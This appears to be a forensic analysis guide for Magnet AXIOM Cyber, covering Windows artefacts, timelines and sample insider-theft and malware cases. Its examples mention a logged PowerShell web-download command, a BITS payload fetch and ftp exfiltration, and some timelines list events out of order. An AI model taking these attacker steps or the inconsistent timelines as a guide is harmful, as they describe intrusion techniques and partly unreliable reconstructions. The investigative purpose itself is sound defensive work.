Axiom Cyber Examiner
Last updated
Last updated
Dashboard: Check artefact categories—e.g., “Windows Artefacts” (Registry, Prefetch), “PowerShell,” “Event Logs”—to scope the data.
Key Views:
Artefact Explorer: Parsed data (e.g., USB history, Amcache).
File System Explorer: Raw files (C:\Windows\System32).
Timeline: Chronological events.
Connections: Entity relationships.
Example: Dashboard shows 1,000+ “Event Log” hits, 50 “PowerShell” entries, and 10 “USB Device” connections—prioritise accordingly.
Example: “Did ‘jdoe’ exfiltrate ‘Q1Report.docx’ via USB on 15 January 2025?”
Step 2: Explore Key Windows Artefacts
Windows Registry:
Location: Artefact Explorer > Windows > Registry.
Hives:
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR: USB details (serial, connect time).
HKU\[SID]\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs: Recent files.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: Autorun persistence.
Example: USBSTOR shows serial “1234ABCD” connected “2025-01-15 14:32:21 UTC.”
Event Logs:
Location: Artefact Explorer > Windows > Event Logs.
Logs:
Security.evtx: Logons (ID 4624), failures (ID 4625).
System.evtx: Startups (ID 6005), service installs (ID 7045).
Application.evtx: App crashes or anomalies.
Example: ID 4624 logs “jdoe” at “14:30:00 UTC.”
Prefetch Files:
Location: Artefact Explorer > Windows > Prefetch.
Purpose: Programme execution evidence.
Example: “WINRAR.EXE-1A2B3C4D.pf” ran “14:35:10 UTC,” referencing “Q1Report.zip.”
LNK Files and Jump Lists:
Location: Artefact Explorer > Windows > LNK Files, Jump Lists.
Purpose: File access history.
Example: “Q1Report.docx.lnk” accessed “14:34:50 UTC.”
Shimcache:
Location: Artefact Explorer > Windows > Shimcache.
Purpose: Historical executions.
Example: “cmd.exe” ran “14:36:00 UTC.”
PowerShell Logs:
Location: Artefact Explorer > Windows > PowerShell.
Logs: Event ID 4104 (Script Block Logging), 4103 (command execution).
Example: “Invoke-WebRequest -Uri ‘ logged at “14:38:00 UTC.”
Amcache:
Location: Artefact Explorer > Windows > Amcache.
Purpose: Tracks executable metadata (SHA1, install time).
Example: “notepad.exe” SHA1 matches a known dropper, executed “14:37:00 UTC.”
BITS:
Location: Artefact Explorer > Windows > BITS Jobs.
Purpose: Background file transfers (e.g., malware downloads).
Example: BITS job downloaded “payload.exe” from “ at “14:39:00 UTC.”
WMI:
Location: Artefact Explorer > Windows > WMI.
Purpose: Persistence or remote execution (e.g., WMI Event Consumers).
Example: “WmiPrvSE.exe” triggered “cmd.exe” at “14:40:00 UTC.”
SRUM:
Location: Artefact Explorer > Windows > SRUM.
Purpose: App usage and network activity.
Example: “winrar.exe” used 50MB at “14:35:00 UTC.”
Step 3: Build a Timeline
Steps: Timeline view > Filter “2025-01-15 14:00:00 - 15:00:00 UTC” > Add “Event Logs,” “Prefetch,” “LNK,” "USB," and “PowerShell.”
Example: Logon (14:30) → File access (14:34) → WinRAR (14:35) → USB (14:32).
Step 4: Correlate with Connections
Steps: Tag “jdoe” and “1234ABCD” as Profiles > Map links (e.g., “jdoe” to “Q1Report.zip” to USB).
Example: Visual confirms “jdoe” tied to file and USB.
Keyword Search:
Steps: Search > “Q1Report” or regex (e.g., \b[A-Za-z0-9]{8}\b for serials).
Example: Hits in LNK, RecentDocs, and carved “Q1Report.zip.”
File System Deep Dive:
Steps: File System Explorer > C:\Windows\System32\winevt\Logs or unallocated space.
Example: Recover deleted “cmd.exe-5D6E7F8G.pf” from unallocated space.
Memory Analysis:
Steps: Artefact Explorer > Memory > Check processes and network connections.
Example: “cmd.exe” spawned “ftp.exe” at “14:37:00 UTC.”
AXIOM Power Features:
Custom Artefacts: Define new parsers (e.g., for custom app logs) via AXIOM’s Artefact Definition tool.
Scripting: Batch tag artefacts with Python (e.g., all “PowerShell” hits as “suspicious”).
Example: Script tags 50 PowerShell commands in 10 seconds.
Edge Cases:
Wiped Logs: Pivot to MFT (File System Explorer > $MFT) for file timestamps or memory for process history.
Example: MFT shows “Q1Report.zip” last modified “14:35:15 UTC” despite cleared logs.
Encrypted Drives: If BitLocker-locked, use the recovery key (if available) during acquisition; otherwise, analyse memory or cloud sync logs.
Example: OneDrive log shows “Q1Report.zip” uploaded “14:45:00 UTC.”
Context: USB + LNK + Prefetch = likely exfiltration.
Example: “Q1Report.zip” (14:35) + USB (14:32) suggests data theft.
False Positives: Ignore “svchost.exe” Prefetch unless tied to user actions.
Anomalies: Off-hours logins (e.g., 2:00 AM on 10 January) or rare tools (e.g., “psexec.exe”).
Tagging: Tag “Exfiltration Evidence” (USB, LNK).
Visuals: Export Timeline PNG (14:30-14:40).
Report: PDF with artefacts, notes, and raw logs (e.g., “ID 4624, jdoe, 14:30”).
Portable Case: Share.mfc for collaboration.
Insider Theft:
Findings: Logon (14:30)→ “Q1Report.docx” (14:34)→ WinRAR (14:35)→ USB “1234ABCD” (14:32).
Conclusion: “jdoe” exfiltrated data.
Malware Infection:
Findings: BITS job downloads “payload.exe” (14:39) → Amcache logs execution (14:40) → PowerShell “Invoke-WebRequest” (14:38) → WMI persistence (14:40) → SRUM shows network spike (14:41).
Timeline:
14:38: PowerShell downloads malware.
14:39: BITS completes the transfer.
14:40: WMI triggers execution.
Conclusion: Malware deployed via the web and persisted via WMI.
Volatility: Export memory dump (File System Explorer) > Analyse with PSList or NetScan.
Example: “ftp.exe” connected to “192.168.1.100” confirms exfiltration.
RegRipper: Export hives (e.g., SYSTEM) > Parse for deeper USB or Run key details.
Example: RegRipper finds “payload.exe” in Run key missed by AXIOM.
Cross-Check: Registry USB times vs. raw USBSTOR hive.
Raw Data: Export Security.evtx for external parsing (e.g., Event Log Explorer).
Filters: Exclude “SYSTEM” logons unless relevant.
Registry Pivot: From USBSTOR to MountedDevices for drive letters.
Batch Export: Multi-select Event Logs to CSV.